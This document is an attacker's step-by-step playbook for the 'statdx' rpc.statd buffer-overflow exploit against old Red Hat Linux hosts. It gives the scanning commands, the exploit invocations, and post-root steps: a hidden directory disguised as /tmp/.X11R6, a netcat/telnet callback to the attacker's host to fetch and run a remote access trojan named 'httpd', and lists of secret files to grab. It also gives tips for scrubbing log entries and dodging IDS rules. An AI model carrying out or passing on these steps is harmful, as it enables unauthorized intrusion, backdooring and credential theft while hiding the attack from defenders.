### statdx (originally) by ron1n

###
### Modified to be TCP by default, and TCP code has been modified
### to reuse the initial RPC connection for your session...cool.
###
### Usage: ./statdx [-r proc] [-u] [-p port] [-a addr] [-l len]
### [-o offset] [-w num] [-s secs] [-d type] <target>
### -r remote procedure to smack...choices are:
### 1 SM_STAT (the default)
### 2 SM_MON.........vulnerable, but not smackable yet
### 3 SM_UNMON.......vulnerable, but not smackable yet
### 4 SM_UNMON_ALL...vulnerable, but not smackable yet
### NOTE SM_SIMU_CRASH(5) and SM_NOTIFY(6) are NOT vulnerable
### -u attack a udp dispatcher [tcp]
### -p rpc.statd serves requests on <port> [query]
### -a the stack address of the buffer is <addr>
### -l the length of the buffer is <len> [1024]
### -o the offset to return to is <offset> [600]
### -w the number of dwords to wipe is <num> [9]
### -s set timeout in seconds to <secs> [5]
### -d use a hardcoded <type>
### Available types:
### 0 Redhat 6.2 (nfs-utils-0.1.6-2)
### 1 Redhat 6.1 (knfsd-1.4.7-7)
### 2 Redhat 6.0 (knfsd-1.2.2-4)
*** Don't forget to use "sgrep" to clean the whopper log entry
*** you'll leave in "/var/log/messages" as a results of your
*** "statdx" attack...
## Using "nmap" to scan for "rpc.statd" on your target? Say, for example,
## a scan of TCP ports 600 through 699, 'cause "portmapper" ain't talkin'?
nmap -sS -p600-699 TARGETIP
rpcinfo -n TARGETPORT -t TARGETIP 100024
***
*** From a Linux box........."statdx" is really "statdx.linux"
*** From a Solaris 2.X box..."statdx" is really "statdx.sparc"
***
## If doing a TCP attack to a Redhat 6.2 target w/port (PREFERRED!!!)...
# Smack...
statdx -d 0 -p TARGETPORT TARGETIP
## If doing a TCP attack to a Redhat 6.2 target wo/port...
# Smack...
statdx -d 0 TARGETIP
## If doing a UDP attack to a Redhat 6.2 target...
## NOTE -- the UDP attack will require another connection, from
## your local IP to the target's port 38912 (used to be
## port 39168 with the default publicly known exploit,
## but this port started showing up in IDS rulesets, go
## figure...STUPID WORM!!!!!!).
# Verify that the subsequent TCP connection will work...
telnet TARGETIP 38912
# Smack...
statdx -d 0 -u TARGETPORT TARGETIP
--- or ---
statdx -d 0 -u TARGETIP
### Once "root"...restart the "rpc.statd"...be a considerate hacker...
## Upload the appropriate restart script from ../bin on LOCALIP
##
## 6.2 (Zoot): ../bin/restart.62.sh --> rs; chmod 700 rs
## 6.1 (Cartman): ../bin/restart.61.sh --> rs; chmod 700 rs
## 6.0 (Hedwig): ../bin/restart.60.sh --> rs; chmod 700 rs
##
## NOTE -- If you upload and execute the WRONG restart script,
## you may be unable to attack "rpc.statd" until your
## system reboots, due to a hosed buffer address.
## 6.2 (Zoot) (nfs-utils-0.1.6-2)
ps -ef |grep rpc
/usr/sbin/lsof |grep ^sh
0<&- 1<&- 2<&- rs
ps -ef |grep rpc
/usr/sbin/lsof | grep rpc.statd
## 6.1 (Cartman) (knfsd-1.4.7-7)
ps -ef |grep rpc
/usr/sbin/lsof |grep ^sh
0<&- 1<&- 2<&- rs
ps -ef |grep rpc
/usr/sbin/lsof | grep rpc.statd
## 6.0 (Hedwig) (knfsd-1.2.2-4)
ps -ef |grep rpc
/usr/sbin/lsof |grep ^sh
0<&- 1<&- 2<&- 3<&- 4<&- 5<&- 7<&- 9<&- 21<&- rs
ps -ef |grep rpc
/usr/sbin/lsof | grep rpc.statd
###
### Time to upload your RAT of choice...make working directory...
id
mkdir /tmp/.X11R6; chmod 700 /tmp/.X11R6; ls -la /tmp
chown root:root /tmp/.X11R6; ls -la /tmp
** or, for GNOME (if you see other "gdm" stuff in "/tmp"...) **
chown root:gdm /tmp/.X11R6; ls -la /tmp
## Start up your "netcat" on your attack hosts, ala...
ls -l httpd.uu
nc -l -p 31117 < httpd.uu
## Move into our working directory, then call back for the RAT...
cd /tmp/.X11R6; pwd
telnet LOCALIP 31117 > httpd.uu
uudecode httpd.uu && uncompress httpd.Z && chmod 700 httpd; ls -la
0<&- 1<&- 2<&- PATH=. httpd
rm httpd httpd.uu; ls -la
### Connect from your local IP
### Outta here...
###
exit 0
### Grab
## /boot most everythig, but probably just what's related in lilo.conf
## /lib/modules
## /etc/modules.conf or conf.modules
## /etc/lilo.conf
## /etc/ppp/pap-secrets /etc/ppp/chap-secrets
## /etc/redhat-release or any release file like that.
## /etc/{any other conf files?}
### List /usr/src for any linux or rpm source info
## Run lilo -q